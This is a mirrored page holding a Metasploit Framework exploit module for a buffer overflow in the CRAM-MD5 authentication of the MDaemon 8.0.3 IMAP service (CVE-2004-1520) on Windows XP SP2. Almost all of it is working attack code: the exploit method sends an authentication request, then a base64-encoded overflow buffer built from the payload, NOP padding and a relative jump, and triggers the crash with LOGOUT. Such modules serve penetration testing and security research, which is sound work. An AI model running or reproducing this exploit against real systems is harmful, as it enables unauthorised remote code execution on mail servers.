Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/mdaemon_cram_md5.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Imap

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in the CRAM-MD5

18
          authentication of the MDaemon IMAP service. This

19
          vulnerability was discovered by Muts.

20
        },

21
        'Author' => [ 'Unknown' ],

22
        'License' => BSD_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2004-1520'],

25
          [ 'OSVDB', '11838'],

26
          [ 'BID', '11675'],

27
        ],

28
        'Privileged' => true,

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
        },

32
        'Payload' => {

33
          'Space' => 500,

34
          'BadChars' => "\x00",

35
          'StackAdjustment' => -3500,

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          [ 'MDaemon IMAP 8.0.3 Windows XP SP2', {} ],

40
        ],

41
        'DisclosureDate' => '2004-11-12',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50
  end

51


52
  def exploit

53
    connect

54


55
    print_status("Asking for CRAM-MD5 authentication...")

56
    sock.put("a001 authenticate cram-md5\r\n")

57
    res = sock.get_once

58


59
    print_status("Received CRAM-MD5 answer: #{res.chomp}")

60
    # Magic no return-address exploitation ninjaness!

61
    buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"

62
    req = Rex::Text.encode_base64(buf) + "\r\n"

63
    sock.put(req)

64
    res = sock.get_once

65


66
    print_status("Received authentication reply: #{res.chomp}")

67
    print_status("Sending LOGOUT to close the thread and trigger an exception")

68
    sock.put("a002 LOGOUT\r\n")

69
    res = sock.get_once

70


71
    print_status("Received LOGOUT reply: #{res.chomp}")

72
    select(nil, nil, nil, 1)

73


74
    handler

75
    disconnect

76
  end

77
end

78


79